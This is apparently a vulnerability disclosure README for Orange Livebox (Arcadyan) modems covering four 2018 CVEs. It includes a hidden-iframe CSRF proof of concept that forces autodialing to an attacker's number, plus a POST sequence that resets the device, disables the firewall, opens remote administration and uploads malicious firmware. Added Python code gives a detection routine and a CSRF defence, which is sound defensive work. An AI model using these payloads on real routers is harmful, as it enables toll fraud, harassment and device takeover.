LIVEBOX-0DAY CVE-2018-20377; 20575; 20576; 20577

Arcadyan ARV7519RW22-A-L T VR9 1.2: multiple security vulnerabilities affecting the latest firmware release on ORANGE Livebox ADSL modems.

Firmware version:  00.96.320S (01.11.2017-11:43:44)
Boot version:  v0.70.03
ADSL modem version:
Hardware version:  02

CWE-359: Exposure of Private Information ('Privacy Violation'). CVE-2018-20576 Detail

A very serious attack vector allows an attacker to link CSRF drive-by vulnerabilities to exploit the Autodialing and Line Test features, successfully making calls from a victim's line, exposing the client's phone number and making them susceptible to scams and impersonation. Nuisance calls alone are also a serious concern.

Proof of concept exploit:

<!DOCTYPE html>

<!-- Phone number disclosure, reflected call exploit -->


<iframe style="display:none" id="csrf-frame-invisible" name="csrf-frame-invisible"></iframe>
<form style="display:none" method='POST' action='' target="csrf-frame-invisible" name="csrf-form-invisible" id="csrf-form-invisible">
  <input type='hidden' name='autodialing_enable' value='1'>
  <input type='hidden' name='autodialing_number' value='5550150'> <!-- attacker's phone number goes here -->
  <input type='hidden' name='autodialing_timeout' value='0'>
  <input type='submit' value='Submit'>


<img src="" width="0" height="0" border="0">


When the victim visits the malicious site, it will create an autodialing profile on the victim's modem, and activate the Line Test feature. No interaction needed. The phone will ring, and when the call is answered the autodialing feature will call the attacker's number.


Demo attack scenario
This vector can be exploited to conduct false flag operations (such as impersonating an individual with a restraining order against another), marketing campaigns, harassment, denial of service, and intelligence gathering.
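Detection logic for the drive-by request described above, added here as an example and not part of the original repository: it scans HTTP request telemetry for POSTs that a page on another origin sent to a private address while carrying parameter names that appear in this page's requests. The record schema, the hosts and the `/PLACEHOLDER` path are assumptions constructed for illustration.

```python
import ipaddress
from urllib.parse import parse_qs, urlsplit

# Parameter names taken from the requests shown on this page.
SENSITIVE_PARAMS = {"autodialing_enable", "autodialing_number",
                    "userNewPswd", "r_mgnt_port"}

def is_private_host(host):
    """True for IP literals in private ranges (where home gateways live)."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return False  # a DNS name (or empty string), not an IP literal

def find_cross_site_lan_posts(records):
    """Return (record, matched_params) for POSTs that a page on another
    origin sent to a private address carrying router configuration fields."""
    hits = []
    for rec in records:
        target = urlsplit(rec["url"]).hostname or ""
        origin = rec.get("origin", "")
        if rec["method"] != "POST" or not origin or not is_private_host(target):
            continue
        if urlsplit(origin).hostname == target:
            continue  # the device's own pages posting to itself
        fields = parse_qs(rec.get("body", ""), keep_blank_values=True)
        matched = sorted(SENSITIVE_PARAMS & set(fields))
        if matched:
            hits.append((rec, matched))
    return hits

# Constructed telemetry; hosts and the /PLACEHOLDER path are sample values.
SAMPLE = [
    {"method": "POST", "url": "http://192.168.1.1/PLACEHOLDER",
     "origin": "http://news.example",
     "body": "autodialing_enable=1&autodialing_number=5550150&autodialing_timeout=0"},
    {"method": "POST", "url": "http://192.168.1.1/PLACEHOLDER",
     "origin": "http://192.168.1.1",
     "body": "submit_action=0&userNew=admin&userOldPswd=admin&userNewPswd=NEWPASS"},
    {"method": "POST", "url": "https://shop.example/cart",
     "origin": "https://shop.example", "body": "qty=1"},
]

if __name__ == "__main__":
    for rec, matched in find_cross_site_lan_posts(SAMPLE):
        print("ALERT", rec["origin"], "->", rec["url"], matched)
```

An `Origin` of `null` (sandboxed frames) is treated as cross-site; requests with no `Origin` at all are skipped because their provenance cannot be judged from this telemetry.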


CWE-200: Information Exposure: Unauthenticated configuration information leak. CVE-2018-20377 Detail

The webserver leaks access point security protocol, SSID, and password in plain text.
CVSS v3.0 Severity and Metrics

Base Score: 9.8 CRITICAL
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Impact Score: 5.9
Exploitability Score: 3.9

Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

CWE-352: Cross-Site Request Forgery (CSRF): The web application does not sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. This allows an attacker to manipulate all configuration parameters. CVE-2018-20577 Detail

Integrity Impact: Complete. (There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the entire system being compromised.)
Availability Impact: Complete. (There is a total shutdown of the affected resource. The attacker can render the resource completely unavailable.)
Access Complexity: Low. (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit.)
Authentication: None. (The vulnerability does not require an attacker or user to be logged into the system.)
User interaction: None.
- Login with default admin:admin credentials after restoring configuration to factory settings. (This can be omitted if the victim has an active session.)
- Change default credentials.
- Enable remote access.
- Upload custom firmware to install remote access malware or brick the system.

POST {empty body} Restores configuration to factory defaults.
POST {empty body} Disables all firewall protections.
POST {IP1=FIRST_OCTET &IP2=SECOND_OCTET &IP3=THIRD_OCTET &IP4=FOURTH_OCTET &r_mgnt_port=_PORT } Allows remote administration. 
POST	{submit_action=0&userNew=admin&userOldPswd=admin&userNewPswd=NEWPASS&userConPswd=NEWPASS&timeout=0} Changes default password.
POST Custom firmware update.
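One way a device web server could perform the verification that CWE-352 says is missing, as an added example rather than Arcadyan's or this repository's code: a state-changing POST is accepted only with an authenticated session, a same-origin `Origin`/`Referer`, and a session-bound token. `SERVER_KEY`, the `csrf_token` field name and the sample hosts are assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumption: a random per-boot secret kept by the device's web server.
SERVER_KEY = secrets.token_bytes(32)

def issue_csrf_token(session_id):
    """Token bound to one session; the server embeds it in each config form."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def same_origin(headers):
    """True only when Origin (or Referer as fallback) names the addressed Host."""
    host = headers.get("Host", "").lower()
    source = headers.get("Origin") or headers.get("Referer")
    if not host or not source:
        return False  # no provenance on a state-changing request: refuse
    return urlsplit(source).netloc.lower() == host

def allow_state_change(method, headers, form, session_id):
    """Gate for configuration POSTs such as the autodialing or password forms."""
    if method != "POST":
        return (False, "state changes must use POST")
    if session_id is None:
        return (False, "no authenticated session")
    if not same_origin(headers):
        return (False, "cross-origin request")
    expected = issue_csrf_token(session_id).encode()
    supplied = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(supplied, expected):
        return (False, "missing or invalid CSRF token")
    return (True, "ok")

if __name__ == "__main__":
    # Constructed requests: 192.168.1.1 and attacker.example are sample values.
    dial = {"autodialing_enable": "1", "autodialing_number": "5550150",
            "autodialing_timeout": "0"}
    forged = {"Host": "192.168.1.1", "Origin": "http://attacker.example"}
    local = {"Host": "192.168.1.1", "Origin": "http://192.168.1.1"}
    print(allow_state_change("POST", forged, dial, "sess-1"))
    print(allow_state_change("POST", local, dial, "sess-1"))
    signed = dict(dial, csrf_token=issue_csrf_token("sess-1"))
    print(allow_state_change("POST", local, signed, "sess-1"))
```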

CWE-912: Hidden Functionality. The software contains functionality that is not documented, not part of the specification, and not accessible through an interface or command sequence that is obvious to the software's users or administrators. CVE-2018-20575 Detail

Manual firmware update. Allows malware to be installed as described before.



Media coverage

On December 21st, 2018, a threat actor identified by Troy Mursch's honeypots at BadPackets LLC is suspected of having attacked over 19000 vulnerable modems in Spain with the exploits described in this repository. The criminal targeted the Credentials Disclosure (CWE-200) vulnerability and likely employed Access Point geolocation databases such as my own GS-LOC to map the APs.

This project is licensed under the MIT License - see the LICENSE file for details

mapez - telegram

